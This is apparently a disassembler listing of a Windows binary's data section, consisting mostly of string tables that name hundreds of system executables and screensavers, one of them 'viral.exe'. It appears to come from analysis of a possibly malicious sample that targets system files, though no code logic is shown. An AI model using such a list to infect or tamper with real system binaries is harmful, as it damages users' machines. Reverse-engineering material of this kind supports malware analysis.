dd offset aCidaemon_exe ; "cidaemon.exe"
dd offset aCipher_exe ; "cipher.exe"
dd offset aCisvc_exe ; "cisvc.exe"
dd offset aCkcnv_exe ; "ckcnv.exe"
dd offset aCleanmgr_exe ; "cleanmgr.exe"
dd offset aCliconfg_exe ; "cliconfg.exe"
dd offset aClipbrd_exe ; "clipbrd.exe"
dd offset aClipsrv_exe ; "clipsrv.exe"
dd offset aClspack_exe ; "clspack.exe"
dd offset aCmd_exe ; "cmd.exe"
dd offset aCmdl32_exe ; "cmdl32.exe"
dd offset aCmmon32_exe ; "cmmon32.exe"
dd offset aCmstp_exe ; "cmstp.exe"
dd offset aComp_exe ; "comp.exe"
dd offset aCompact_exe ; "compact.exe"
dd offset aConime_exe ; "conime.exe"
dd offset aControl_exe ; "control.exe"
dd offset aConvert_exe ; "convert.exe"
dd offset aCscript_exe ; "cscript.exe"
dd offset aCsrss_exe ; "csrss.exe"
dd offset aCtfmon_exe ; "ctfmon.exe"
dd offset aDcomcnfg_exe ; "dcomcnfg.exe"
dd offset aDdeshare_exe ; "ddeshare.exe"
dd offset aDebug_exe ; "debug.exe"
dd offset aDefrag_exe ; "defrag.exe"
dd offset aDfrgfat_exe ; "dfrgfat.exe"
dd offset aDfrgntfs_exe ; "dfrgntfs.exe"
dd offset aDiantz_exe ; "diantz.exe"
dd offset aDiskpart_exe ; "diskpart.exe"
dd offset aDiskperf_exe ; "diskperf.exe"
dd offset aDllhost_exe ; "dllhost.exe"
dd offset aDllhst3g_exe ; "dllhst3g.exe"
dd offset aDmadmin_exe ; "dmadmin.exe"
dd offset aDmremote_exe ; "dmremote.exe"
dd offset aDoskey_exe ; "doskey.exe"
dd offset aDosx_exe ; "dosx.exe"
dd offset aDplaysvr_exe ; "dplaysvr.exe"
dd offset aDpnsvr_exe ; "dpnsvr.exe"
dd offset aDpvsetup_exe ; "dpvsetup.exe"
dd offset aDriverquery_ex ; "driverquery.exe"
dd offset aDrwatson_exe ; "drwatson.exe"
dd offset aDrwtsn32_exe ; "drwtsn32.exe"
dd offset aDumprep_exe ; "dumprep.exe"
dd offset aDvdplay_exe ; "dvdplay.exe"
dd offset aDvdupgrd_exe ; "dvdupgrd.exe"
dd offset aDwwin_exe ; "dwwin.exe"
dd offset aDxdiag_exe ; "dxdiag.exe"
dd offset aEdlin_exe ; "edlin.exe"
dd offset aEsentutl_exe ; "esentutl.exe"
dd offset aEudcedit_exe ; "eudcedit.exe"
dd offset aEventcreate_ex ; "eventcreate.exe"
dd offset aEventtriggers_ ; "eventtriggers.exe"
dd offset aEventvwr_exe ; "eventvwr.exe"
dd offset aExe2bin_exe ; "exe2bin.exe"
dd offset aExpand_exe ; "expand.exe"
dd offset aExtrac32_exe ; "extrac32.exe"
dd offset aFastopen_exe ; "fastopen.exe"
dd offset aFc_exe ; "fc.exe"
dd offset aFind_exe ; "find.exe"
dd offset aFindstr_exe ; "findstr.exe"
dd offset aFinger_exe ; "finger.exe"
dd offset aFixmapi_exe ; "fixmapi.exe"
dd offset aFltmc_exe ; "fltMc.exe"
dd offset aFontview_exe ; "fontview.exe"
dd offset aForcedos_exe ; "forcedos.exe"
dd offset aFreecell_exe ; "freecell.exe"
dd offset aFsquirt_exe ; "fsquirt.exe"
dd offset aFsutil_exe ; "fsutil.exe"
dd offset aFtp_exe ; "ftp.exe"
dd offset aGb2312_uce ; "gb2312.uce"
dd offset aGdi_exe ; "gdi.exe"
dd offset aGetmac_exe ; "getmac.exe"
dd offset aGpresult_exe ; "gpresult.exe"
dd offset aGpupdate_exe ; "gpupdate.exe"
dd offset aGrpconv_exe ; "grpconv.exe"
dd offset aHelp_exe ; "help.exe"
dd offset aHostname_exe ; "hostname.exe"
dd offset aIe4uinit_exe ; "ie4uinit.exe"
dd offset aIexpress_exe ; "iexpress.exe"
dd offset aImapi_exe ; "imapi.exe"
dd offset aIpconfig_exe ; "ipconfig.exe"
dd offset aIpsec6_exe ; "ipsec6.exe"
dd offset aIpv6_exe ; "ipv6.exe"
dd offset aIpxroute_exe ; "ipxroute.exe"
dd offset aJava_exe ; "java.exe"
dd offset aJavaw_exe ; "javaw.exe"
dd offset aJavaws_exe ; "javaws.exe"
dd offset aJdbgmgr_exe ; "jdbgmgr.exe"
dd offset aJview_exe ; "jview.exe"
dd offset aKrnl386_exe ; "krnl386.exe"
dd offset aLabel_exe ; "label.exe"
dd offset aLights_exe ; "lights.exe"
dd offset aLnkstub_exe ; "lnkstub.exe"
dd offset aLocator_exe ; "locator.exe"
dd offset aLodctr_exe ; "lodctr.exe"
dd offset aLogagent_exe ; "logagent.exe"
dd offset aLogman_exe ; "logman.exe"
dd offset aLogoff_exe ; "logoff.exe"
dd offset aLogonui_exe ; "logonui.exe"
dd offset aLpq_exe ; "lpq.exe"
dd offset aLpr_exe ; "lpr.exe"
dd offset aLsass_exe ; "lsass.exe"
dd offset aMagnify_exe ; "magnify.exe"
dd offset aMakecab_exe ; "makecab.exe"
dd offset aMem_exe ; "mem.exe"
dd offset aMigpwd_exe ; "migpwd.exe"
dd offset aMmc_exe ; "mmc.exe"
dd offset aMnmsrvc_exe ; "mnmsrvc.exe"
dd offset aMobsync_exe ; "mobsync.exe"
dd offset aMountvol_exe ; "mountvol.exe"
dd offset aMplay32_exe ; "mplay32.exe"
dd offset aMpnotify_exe ; "mpnotify.exe"
dd offset aMqbkup_exe ; "mqbkup.exe"
dd offset aMqsvc_exe ; "mqsvc.exe"
dd offset aMqtgsvc_exe ; "mqtgsvc.exe"
dd offset aMrinfo_exe ; "mrinfo.exe"
dd offset aMrt_exe ; "MRT.exe"
dd offset aMscdexnt_exe ; "mscdexnt.exe"
dd offset aMsdtc_exe ; "msdtc.exe"
dd offset aMsg_exe ; "msg.exe"
dd offset aMshearts_exe ; "mshearts.exe"
dd offset aMshta_exe ; "mshta.exe"
dd offset aMsiexec_exe ; "msiexec.exe"
dd offset aMspaint_exe ; "mspaint.exe"
dd offset aMsswchx_exe ; "msswchx.exe"
dd offset aMstinit_exe ; "mstinit.exe"
dd offset aMstsc_exe ; "mstsc.exe"
dd offset aNarrator_exe ; "narrator.exe"
dd offset aNbtstat_exe ; "nbtstat.exe"
dd offset aNddeapir_exe ; "nddeapir.exe"
dd offset aNerocheck_exe ; "NeroCheck.exe"
dd offset aNet_exe ; "net.exe"
dd offset aNet1_exe ; "net1.exe"
dd offset aNetdde_exe ; "netdde.exe"
dd offset aNetsetup_exe ; "netsetup.exe"
dd offset aNetsh_exe ; "netsh.exe"
dd offset aNetstat_exe ; "netstat.exe"
dd offset aNlsfunc_exe ; "nlsfunc.exe"
dd offset aNotepad_exe ; "notepad.exe"
dd offset aNslookup_exe ; "nslookup.exe"
dd offset aNtbackup_exe ; "ntbackup.exe"
dd offset aNtkrnlpa_exe ; "ntkrnlpa.exe"
dd offset aNtoskrnl_exe ; "ntoskrnl.exe"
dd offset aNtsd_exe ; "ntsd.exe"
dd offset aNtvdm_exe ; "ntvdm.exe"
dd offset aNw16_exe ; "nw16.exe"
dd offset aNwscript_exe ; "nwscript.exe"
dd offset aOdbcad32_exe ; "odbcad32.exe"
dd offset aOdbcconf_exe ; "odbcconf.exe"
dd offset aOpenfiles_exe ; "openfiles.exe"
dd offset aOsk_exe ; "osk.exe"
dd offset aOsuninst_exe ; "osuninst.exe"
dd offset aPackager_exe ; "packager.exe"
dd offset aPathping_exe ; "pathping.exe"
dd offset aPentnt_exe ; "pentnt.exe"
dd offset aPerfmon_exe ; "perfmon.exe"
dd offset aPing_exe ; "ping.exe"
dd offset aPing6_exe ; "ping6.exe"
dd offset aPowercfg_exe ; "powercfg.exe"
dd offset aPrint_exe ; "print.exe"
dd offset aProgman_exe ; "progman.exe"
dd offset aProquota_exe ; "proquota.exe"
dd offset aProxycfg_exe ; "proxycfg.exe"
dd offset aQappsrv_exe ; "qappsrv.exe"
dd offset aQprocess_exe ; "qprocess.exe"
dd offset aQwinsta_exe ; "qwinsta.exe"
dd offset aRasautou_exe ; "rasautou.exe"
dd offset aRasdial_exe ; "rasdial.exe"
dd offset aRasphone_exe ; "rasphone.exe"
dd offset aRcimlby_exe ; "rcimlby.exe"
dd offset aRcp_exe ; "rcp.exe"
dd offset aRdpclip_exe ; "rdpclip.exe"
dd offset aRdsaddin_exe ; "rdsaddin.exe"
dd offset aRdshost_exe ; "rdshost.exe"
dd offset aRecover_exe ; "recover.exe"
dd offset aRedir_exe ; "redir.exe"
dd offset aReg_exe ; "reg.exe"
dd offset aRegcladm_exe ; "REGCLADM.EXE"
dd offset aRegedt32_exe ; "regedt32.exe"
dd offset aRegini_exe ; "regini.exe"
dd offset aRegsvr32_exe ; "regsvr32.exe"
dd offset aRegwiz_exe ; "regwiz.exe"
dd offset aRelog_exe ; "relog.exe"
dd offset aReplace_exe ; "replace.exe"
dd offset aReset_exe ; "reset.exe"
dd offset aRexec_exe ; "rexec.exe"
dd offset aRoute_exe ; "route.exe"
dd offset aRoutemon_exe ; "routemon.exe"
dd offset aRsh_exe ; "rsh.exe"
dd offset aRsm_exe ; "rsm.exe"
dd offset aRsmsink_exe ; "rsmsink.exe"
dd offset aRsmui_exe ; "rsmui.exe"
dd offset aRsnotify_exe ; "rsnotify.exe"
dd offset aRsopprov_exe ; "rsopprov.exe"
dd offset aRsvp_exe ; "rsvp.exe"
dd offset aRtcshare_exe ; "rtcshare.exe"
dd offset aRtlcpl_exe ; "RTLCPL.EXE"
dd offset aRunas_exe ; "runas.exe"
dd offset aRundll32_exe ; "rundll32.exe"
dd offset aRunonce_exe ; "runonce.exe"
dd offset aRwinsta_exe ; "rwinsta.exe"
dd offset aSavedump_exe ; "savedump.exe"
dd offset aSc_exe ; "sc.exe"
dd offset aScardsvr_exe ; "scardsvr.exe"
dd offset aSchtasks_exe ; "schtasks.exe"
dd offset aSdbinst_exe ; "sdbinst.exe"
dd offset aSecedit_exe ; "secedit.exe"
dd offset aServices_exe ; "services.exe"
dd offset aSessmgr_exe ; "sessmgr.exe"
dd offset aSethc_exe ; "sethc.exe"
dd offset aSetup_exe ; "setup.exe"
dd offset aSetver_exe ; "setver.exe"
dd offset aSfc_exe ; "sfc.exe"
dd offset aShadow_exe ; "shadow.exe"
dd offset aShare_exe ; "share.exe"
dd offset aShmgrate_exe ; "shmgrate.exe"
dd offset aShrpubw_exe ; "shrpubw.exe"
dd offset aShutdown_exe ; "shutdown.exe"
dd offset aSigverif_exe ; "sigverif.exe"
dd offset aSkeys_exe ; "skeys.exe"
dd offset aSmbinst_exe ; "smbinst.exe"
dd offset aSmlogsvc_exe ; "smlogsvc.exe"
dd offset aSmss_exe ; "smss.exe"
dd offset aSndrec32_exe ; "sndrec32.exe"
dd offset aSndvol32_exe ; "sndvol32.exe"
dd offset aSol_exe ; "sol.exe"
dd offset aSort_exe ; "sort.exe"
dd offset aSpider_exe ; "spider.exe"
dd offset aSpiisupd_exe ; "spiisupd.exe"
dd offset aSpnpinst_exe ; "spnpinst.exe"
dd offset aSpoolsv_exe ; "spoolsv.exe"
dd offset aSprestrt_exe ; "sprestrt.exe"
dd offset aSpupdsvc_exe ; "spupdsvc.exe"
dd offset aStimon_exe ; "stimon.exe"
dd offset aSubrange_uce ; "subrange.uce"
dd offset aSubst_exe ; "subst.exe"
dd offset aSvchost_exe ; "svchost.exe"
dd offset aSyncapp_exe ; "syncapp.exe"
dd offset aSysedit_exe ; "sysedit.exe"
dd offset aSyskey_exe ; "syskey.exe"
dd offset aSysocmgr_exe ; "sysocmgr.exe"
dd offset aSysteminfo_exe ; "systeminfo.exe"
dd offset aSystray_exe ; "systray.exe"
dd offset aTaskkill_exe ; "taskkill.exe"
dd offset aTasklist_exe ; "tasklist.exe"
dd offset aTaskman_exe ; "taskman.exe"
dd offset aTaskmgr_exe ; "taskmgr.exe"
dd offset aTcmsetup_exe ; "tcmsetup.exe"
dd offset aTcpsvcs_exe ; "tcpsvcs.exe"
dd offset aTelnet_exe ; "telnet.exe"
dd offset aTftp_exe ; "tftp.exe"
dd offset aTlntadmn_exe ; "tlntadmn.exe"
dd offset aTlntsess_exe ; "tlntsess.exe"
dd offset aTlntsvr_exe ; "tlntsvr.exe"
dd offset aTourstart_exe ; "tourstart.exe"
dd offset aTracerpt_exe ; "tracerpt.exe"
dd offset aTracert_exe ; "tracert.exe"
dd offset aTracert6_exe ; "tracert6.exe"
dd offset aTscon_exe ; "tscon.exe"
dd offset aTscupgrd_exe ; "tscupgrd.exe"
dd offset aTsdiscon_exe ; "tsdiscon.exe"
dd offset aTskill_exe ; "tskill.exe"
dd offset aTsshutdn_exe ; "tsshutdn.exe"
dd offset aTypeperf_exe ; "typeperf.exe"
dd offset aUnlodctr_exe ; "unlodctr.exe"
dd offset aUpnpcont_exe ; "upnpcont.exe"
dd offset aUps_exe ; "ups.exe"
dd offset aUser_exe ; "user.exe"
dd offset aUserinit_exe ; "userinit.exe"
dd offset aUsrmlnka_exe ; "usrmlnka.exe"
dd offset aUsrprbda_exe ; "usrprbda.exe"
dd offset aUsrshuta_exe ; "usrshuta.exe"
dd offset aUtilman_exe ; "utilman.exe"
dd offset aVerclsid_exe ; "verclsid.exe"
dd offset aVerifier_exe ; "verifier.exe"
dd offset aViral_exe ; "viral.exe"
dd offset aVssadmin_exe ; "vssadmin.exe"
dd offset aVssvc_exe ; "vssvc.exe"
dd offset aVwipxspx_exe ; "vwipxspx.exe"
dd offset aW32tm_exe ; "w32tm.exe"
dd offset aWextract_exe ; "wextract.exe"
dd offset aWiaacmgr_exe ; "wiaacmgr.exe"
dd offset aWinchat_exe ; "winchat.exe"
dd offset aWindbver_exe ; "WINDBVER.EXE"
dd offset aWinhlp32_exe ; "winhlp32.exe"
dd offset aWinlogon_exe ; "winlogon.exe"
dd offset aWinmine_exe ; "winmine.exe"
dd offset aWinmsd_exe ; "winmsd.exe"
dd offset aWinspool_exe ; "winspool.exe"
dd offset aWinver_exe ; "winver.exe"
dd offset aWjview_exe ; "wjview.exe"
dd offset aWowdeb_exe ; "wowdeb.exe"
dd offset aWowexec_exe ; "wowexec.exe"
dd offset aWpabaln_exe ; "wpabaln.exe"
dd offset aWpnpinst_exe ; "wpnpinst.exe"
dd offset aWrite_exe ; "write.exe"
dd offset aWscntfy_exe ; "wscntfy.exe"
dd offset aWscript_exe ; "wscript.exe"
dd offset aWuauclt_exe ; "wuauclt.exe"
dd offset aWuauclt1_exe ; "wuauclt1.exe"
dd offset aWupdmgr_exe ; "wupdmgr.exe"
dd offset aXcopy_exe ; "xcopy.exe"
dd offset aAcdsee_scr ; "ACDSee.scr"
dd offset aLogon_scr ; "logon.scr"
dd offset aScrnsave_scr ; "scrnsave.scr"
dd offset aSeismosaver_sc ; "SeismoSaver.scr"
dd offset aSs3dfo_scr ; "ss3dfo.scr"
dd offset aSsbezier_scr ; "ssbezier.scr"
dd offset aSsflwbox_scr ; "ssflwbox.scr"
dd offset aSsmarque_scr ; "ssmarque.scr"
dd offset aSsmypics_scr ; "ssmypics.scr"
dd offset aSsmyst_scr ; "ssmyst.scr"
dd offset aSspipes_scr ; "sspipes.scr"
dd offset aSsstars_scr ; "ssstars.scr"
dd offset aSstext3d_scr ; "sstext3d.scr"
; LPCSTR off_41F6AC
off_41F6AC dd offset aAlcrmv_exe ; DATA XREF: sub_405D52+3D3�r
; "alcrmv.exe"
dd offset aAlcupd_exe ; "alcupd.exe"
dd offset aExplorer_exe_0 ; "explorer.exe"
dd offset aHh_exe ; "hh.exe"
dd offset aIsuninst_exe ; "IsUninst.exe"
dd offset aIun6002_exe ; "iun6002.exe"
dd offset aNotepad_exe_0 ; "NOTEPAD.EXE"
dd offset aRegedit_exe ; "regedit.exe"
dd offset aRegtlib_exe ; "REGTLIB.EXE"
dd offset aSetdebug_exe ; "setdebug.exe"
dd offset aSetup1_exe ; "Setup1.exe"
dd offset aSoundman_exe ; "SOUNDMAN.EXE"
dd offset aSt6unst_exe ; "ST6UNST.EXE"
dd offset aTaskman_exe_0 ; "TASKMAN.EXE"
dd offset aTwunk_16_exe ; "twunk_16.exe"
dd offset aTwunk_32_exe ; "twunk_32.exe"
dd offset aWinhelp_exe ; "winhelp.exe"
dd offset aWinhlp32_exe_0 ; "winhlp32.exe"
dd offset aSystem ; "System"
aAccwiz_exe db 'accwiz.exe',0 ; DATA XREF: .data:lpString2�o
align 4
aActmovie_exe db 'actmovie.exe',0 ; DATA XREF: .data:0041F150�o
align 4
aAhui_exe db 'ahui.exe',0 ; DATA XREF: .data:0041F154�o
align 10h
aAlg_exe db 'alg.exe',0 ; DATA XREF: .data:0041F158�o
aAppend_exe db 'append.exe',0 ; DATA XREF: .data:0041F15C�o
align 4
aArp_exe db 'arp.exe',0 ; DATA XREF: .data:0041F160�o
aAsr_fmt_exe db 'asr_fmt.exe',0 ; DATA XREF: .data:0041F164�o
aAsr_ldm_exe db 'asr_ldm.exe',0 ; DATA XREF: .data:0041F168�o
aAsr_pfu_exe db 'asr_pfu.exe',0 ; DATA XREF: .data:0041F16C�o
aAt_exe db 'at.exe',0 ; DATA XREF: .data:0041F170�o
align 4
aAti2evxx_exe db 'ati2evxx.exe',0 ; DATA XREF: .data:0041F174�o
align 4
aAti2mdxx_exe db 'Ati2mdxx.exe',0 ; DATA XREF: .data:0041F178�o
align 4
aAtmadm_exe db 'atmadm.exe',0 ; DATA XREF: .data:0041F17C�o
align 4
aAttrib_exe db 'attrib.exe',0 ; DATA XREF: .data:0041F180�o
align 10h
aAuditusr_exe db 'auditusr.exe',0 ; DATA XREF: .data:0041F184�o
align 10h
aAutochk_exe db 'autochk.exe',0 ; DATA XREF: .data:0041F188�o
aAutoconv_exe db 'autoconv.exe',0 ; DATA XREF: .data:0041F18C�o
align 4
aAutofmt_exe db 'autofmt.exe',0 ; DATA XREF: .data:0041F190�o
aAutolfn_exe db 'autolfn.exe',0 ; DATA XREF: .data:0041F194�o
aBlastcln_exe db 'blastcln.exe',0 ; DATA XREF: .data:0041F198�o
align 4
aBootcfg_exe db 'bootcfg.exe',0 ; DATA XREF: .data:0041F19C�o
aBootok_exe db 'bootok.exe',0 ; DATA XREF: .data:0041F1A0�o
align 4
aBootvrfy_exe db 'bootvrfy.exe',0 ; DATA XREF: .data:0041F1A4�o
align 4
aCacls_exe db 'cacls.exe',0 ; DATA XREF: .data:0041F1A8�o
align 4
aCalc_exe db 'calc.exe',0 ; DATA XREF: .data:0041F1AC�o
align 4
aCharmap_exe db 'charmap.exe',0 ; DATA XREF: .data:0041F1B0�o
aChcfg_exe db 'ChCfg.exe',0 ; DATA XREF: .data:0041F1B4�o
align 4
aChkdsk_exe db 'chkdsk.exe',0 ; DATA XREF: .data:0041F1B8�o
align 4
aChkntfs_exe db 'chkntfs.exe',0 ; DATA XREF: .data:0041F1BC�o
aCidaemon_exe db 'cidaemon.exe',0 ; DATA XREF: .data:0041F1C0�o
align 4
aCipher_exe db 'cipher.exe',0 ; DATA XREF: .data:0041F1C4�o
align 10h
aCisvc_exe db 'cisvc.exe',0 ; DATA XREF: .data:0041F1C8�o
align 4
aCkcnv_exe db 'ckcnv.exe',0 ; DATA XREF: .data:0041F1CC�o
align 4
aCleanmgr_exe db 'cleanmgr.exe',0 ; DATA XREF: .data:0041F1D0�o
align 4
aCliconfg_exe db 'cliconfg.exe',0 ; DATA XREF: .data:0041F1D4�o
align 4
aClipbrd_exe db 'clipbrd.exe',0 ; DATA XREF: .data:0041F1D8�o
aClipsrv_exe db 'clipsrv.exe',0 ; DATA XREF: .data:0041F1DC�o
aClspack_exe db 'clspack.exe',0 ; DATA XREF: .data:0041F1E0�o
aCmd_exe db 'cmd.exe',0 ; DATA XREF: .data:0041F1E4�o
aCmdl32_exe db 'cmdl32.exe',0 ; DATA XREF: .data:0041F1E8�o
align 10h
aCmmon32_exe db 'cmmon32.exe',0 ; DATA XREF: .data:0041F1EC�o
aCmstp_exe db 'cmstp.exe',0 ; DATA XREF: .data:0041F1F0�o
align 4
aComp_exe db 'comp.exe',0 ; DATA XREF: .data:0041F1F4�o
align 4
aCompact_exe db 'compact.exe',0 ; DATA XREF: .data:0041F1F8�o
aConime_exe db 'conime.exe',0 ; DATA XREF: .data:0041F1FC�o
align 4
aControl_exe db 'control.exe',0 ; DATA XREF: .data:0041F200�o
aConvert_exe db 'convert.exe',0 ; DATA XREF: .data:0041F204�o
aCscript_exe db 'cscript.exe',0 ; DATA XREF: .data:0041F208�o
aCsrss_exe db 'csrss.exe',0 ; DATA XREF: .data:0041F20C�o
align 4
aCtfmon_exe db 'ctfmon.exe',0 ; DATA XREF: .data:0041F210�o
align 4
aDcomcnfg_exe db 'dcomcnfg.exe',0 ; DATA XREF: .data:0041F214�o
align 4
aDdeshare_exe db 'ddeshare.exe',0 ; DATA XREF: .data:0041F218�o
align 4
aDebug_exe db 'debug.exe',0 ; DATA XREF: .data:0041F21C�o
align 4
aDefrag_exe db 'defrag.exe',0 ; DATA XREF: .data:0041F220�o
align 10h
aDfrgfat_exe db 'dfrgfat.exe',0 ; DATA XREF: .data:0041F224�o
aDfrgntfs_exe db 'dfrgntfs.exe',0 ; DATA XREF: .data:0041F228�o
align 4
aDiantz_exe db 'diantz.exe',0 ; DATA XREF: .data:0041F22C�o
align 4
aDiskpart_exe db 'diskpart.exe',0 ; DATA XREF: .data:0041F230�o
align 4
aDiskperf_exe db 'diskperf.exe',0 ; DATA XREF: .data:0041F234�o
align 4
aDllhost_exe db 'dllhost.exe',0 ; DATA XREF: .data:0041F238�o
aDllhst3g_exe db 'dllhst3g.exe',0 ; DATA XREF: .data:0041F23C�o
align 4
aDmadmin_exe db 'dmadmin.exe',0 ; DATA XREF: .data:0041F240�o
aDmremote_exe db 'dmremote.exe',0 ; DATA XREF: .data:0041F244�o
align 10h
aDoskey_exe db 'doskey.exe',0 ; DATA XREF: .data:0041F248�o
align 4
aDosx_exe db 'dosx.exe',0 ; DATA XREF: .data:0041F24C�o
align 4
aDplaysvr_exe db 'dplaysvr.exe',0 ; DATA XREF: .data:0041F250�o
align 4
aDpnsvr_exe db 'dpnsvr.exe',0 ; DATA XREF: .data:0041F254�o
align 4
aDpvsetup_exe db 'dpvsetup.exe',0 ; DATA XREF: .data:0041F258�o
align 4
aDriverquery_ex db 'driverquery.exe',0 ; DATA XREF: .data:0041F25C�o
aDrwatson_exe db 'drwatson.exe',0 ; DATA XREF: .data:0041F260�o
align 4
aDrwtsn32_exe db 'drwtsn32.exe',0 ; DATA XREF: .data:0041F264�o
align 4
aDumprep_exe db 'dumprep.exe',0 ; DATA XREF: .data:0041F268�o
aDvdplay_exe db 'dvdplay.exe',0 ; DATA XREF: .data:0041F26C�o
aDvdupgrd_exe db 'dvdupgrd.exe',0 ; DATA XREF: .data:0041F270�o
align 4
aDwwin_exe db 'dwwin.exe',0 ; DATA XREF: .data:0041F274�o
align 4
aDxdiag_exe db 'dxdiag.exe',0 ; DATA XREF: .data:0041F278�o
align 4
aEdlin_exe db 'edlin.exe',0 ; DATA XREF: .data:0041F27C�o
align 10h
aEsentutl_exe db 'esentutl.exe',0 ; DATA XREF: .data:0041F280�o
align 10h
aEudcedit_exe db 'eudcedit.exe',0 ; DATA XREF: .data:0041F284�o
align 10h
aEventcreate_ex db 'eventcreate.exe',0 ; DATA XREF: .data:0041F288�o
aEventtriggers_ db 'eventtriggers.exe',0 ; DATA XREF: .data:0041F28C�o
align 4
aEventvwr_exe db 'eventvwr.exe',0 ; DATA XREF: .data:0041F290�o
align 4
aExe2bin_exe db 'exe2bin.exe',0 ; DATA XREF: .data:0041F294�o
aExpand_exe db 'expand.exe',0 ; DATA XREF: .data:0041F298�o
align 4
aExtrac32_exe db 'extrac32.exe',0 ; DATA XREF: .data:0041F29C�o
align 4
aFastopen_exe db 'fastopen.exe',0 ; DATA XREF: .data:0041F2A0�o
align 4
aFc_exe db 'fc.exe',0 ; DATA XREF: .data:0041F2A4�o
align 4
aFind_exe db 'find.exe',0 ; DATA XREF: .data:0041F2A8�o
align 10h
aFindstr_exe db 'findstr.exe',0 ; DATA XREF: .data:0041F2AC�o
aFinger_exe db 'finger.exe',0 ; DATA XREF: .data:0041F2B0�o
align 4
aFixmapi_exe db 'fixmapi.exe',0 ; DATA XREF: .data:0041F2B4�o
aFltmc_exe db 'fltMc.exe',0 ; DATA XREF: .data:0041F2B8�o
align 10h
aFontview_exe db 'fontview.exe',0 ; DATA XREF: .data:0041F2BC�o
align 10h
aForcedos_exe db 'forcedos.exe',0 ; DATA XREF: .data:0041F2C0�o
align 10h
aFreecell_exe db 'freecell.exe',0 ; DATA XREF: .data:0041F2C4�o
align 10h
aFsquirt_exe db 'fsquirt.exe',0 ; DATA XREF: .data:0041F2C8�o
aFsutil_exe db 'fsutil.exe',0 ; DATA XREF: .data:0041F2CC�o
align 4
aFtp_exe db 'ftp.exe',0 ; DATA XREF: .data:0041F2D0�o
aGb2312_uce db 'gb2312.uce',0 ; DATA XREF: .data:0041F2D4�o
align 4
aGdi_exe db 'gdi.exe',0 ; DATA XREF: .data:0041F2D8�o
aGetmac_exe db 'getmac.exe',0 ; DATA XREF: .data:0041F2DC�o
align 10h
aGpresult_exe db 'gpresult.exe',0 ; DATA XREF: .data:0041F2E0�o
align 10h
aGpupdate_exe db 'gpupdate.exe',0 ; DATA XREF: .data:0041F2E4�o
align 10h
aGrpconv_exe db 'grpconv.exe',0 ; DATA XREF: .data:0041F2E8�o
aHelp_exe db 'help.exe',0 ; DATA XREF: .data:0041F2EC�o
align 4
aHostname_exe db 'hostname.exe',0 ; DATA XREF: .data:0041F2F0�o
align 4
aIe4uinit_exe db 'ie4uinit.exe',0 ; DATA XREF: .data:0041F2F4�o
align 4
aIexpress_exe db 'iexpress.exe',0 ; DATA XREF: .data:0041F2F8�o
align 4
aImapi_exe db 'imapi.exe',0 ; DATA XREF: .data:0041F2FC�o
align 4
aIpconfig_exe db 'ipconfig.exe',0 ; DATA XREF: .data:0041F300�o
align 4
aIpsec6_exe db 'ipsec6.exe',0 ; DATA XREF: .data:0041F304�o
align 10h
aIpv6_exe db 'ipv6.exe',0 ; DATA XREF: .data:0041F308�o
align 4
aIpxroute_exe db 'ipxroute.exe',0 ; DATA XREF: .data:0041F30C�o
align 4
aJava_exe db 'java.exe',0 ; DATA XREF: .data:0041F310�o
align 4
aJavaw_exe db 'javaw.exe',0 ; DATA XREF: .data:0041F314�o
align 4
aJavaws_exe db 'javaws.exe',0 ; DATA XREF: .data:0041F318�o
align 10h
aJdbgmgr_exe db 'jdbgmgr.exe',0 ; DATA XREF: .data:0041F31C�o
aJview_exe db 'jview.exe',0 ; DATA XREF: .data:0041F320�o
align 4
aKrnl386_exe db 'krnl386.exe',0 ; DATA XREF: .data:0041F324�o
aLabel_exe db 'label.exe',0 ; DATA XREF: .data:0041F328�o
align 10h
aLights_exe db 'lights.exe',0 ; DATA XREF: .data:0041F32C�o
align 4
aLnkstub_exe db 'lnkstub.exe',0 ; DATA XREF: .data:0041F330�o
aLocator_exe db 'locator.exe',0 ; DATA XREF: .data:0041F334�o
aLodctr_exe db 'lodctr.exe',0 ; DATA XREF: .data:0041F338�o
align 10h
aLogagent_exe db 'logagent.exe',0 ; DATA XREF: .data:0041F33C�o
align 10h
aLogman_exe db 'logman.exe',0 ; DATA XREF: .data:0041F340�o
align 4
aLogoff_exe db 'logoff.exe',0 ; DATA XREF: .data:0041F344�o
align 4
aLogonui_exe db 'logonui.exe',0 ; DATA XREF: .data:0041F348�o
aLpq_exe db 'lpq.exe',0 ; DATA XREF: .data:0041F34C�o
aLpr_exe db 'lpr.exe',0 ; DATA XREF: .data:0041F350�o
aLsass_exe db 'lsass.exe',0 ; DATA XREF: .data:0041F354�o
align 10h
aMagnify_exe db 'magnify.exe',0 ; DATA XREF: .data:0041F358�o
aMakecab_exe db 'makecab.exe',0 ; DATA XREF: .data:0041F35C�o
aMem_exe db 'mem.exe',0 ; DATA XREF: .data:0041F360�o
aMigpwd_exe db 'migpwd.exe',0 ; DATA XREF: .data:0041F364�o
align 4
aMmc_exe db 'mmc.exe',0 ; DATA XREF: .data:0041F368�o
aMnmsrvc_exe db 'mnmsrvc.exe',0 ; DATA XREF: .data:0041F36C�o
aMobsync_exe db 'mobsync.exe',0 ; DATA XREF: .data:0041F370�o
aMountvol_exe db 'mountvol.exe',0 ; DATA XREF: .data:0041F374�o
align 4
aMplay32_exe db 'mplay32.exe',0 ; DATA XREF: .data:0041F378�o
aMpnotify_exe db 'mpnotify.exe',0 ; DATA XREF: .data:0041F37C�o
align 4
aMqbkup_exe db 'mqbkup.exe',0 ; DATA XREF: .data:0041F380�o
align 4
aMqsvc_exe db 'mqsvc.exe',0 ; DATA XREF: .data:0041F384�o
align 10h
aMqtgsvc_exe db 'mqtgsvc.exe',0 ; DATA XREF: .data:0041F388�o
aMrinfo_exe db 'mrinfo.exe',0 ; DATA XREF: .data:0041F38C�o
align 4
aMrt_exe db 'MRT.exe',0 ; DATA XREF: .data:0041F390�o
aMscdexnt_exe db 'mscdexnt.exe',0 ; DATA XREF: .data:0041F394�o
align 10h
aMsdtc_exe db 'msdtc.exe',0 ; DATA XREF: .data:0041F398�o
align 4
aMsg_exe db 'msg.exe',0 ; DATA XREF: .data:0041F39C�o
aMshearts_exe db 'mshearts.exe',0 ; DATA XREF: .data:0041F3A0�o
align 4
aMshta_exe db 'mshta.exe',0 ; DATA XREF: .data:0041F3A4�o
align 10h
aMsiexec_exe db 'msiexec.exe',0 ; DATA XREF: .data:0041F3A8�o
aMspaint_exe db 'mspaint.exe',0 ; DATA XREF: .data:0041F3AC�o
aMsswchx_exe db 'msswchx.exe',0 ; DATA XREF: .data:0041F3B0�o
aMstinit_exe db 'mstinit.exe',0 ; DATA XREF: .data:0041F3B4�o
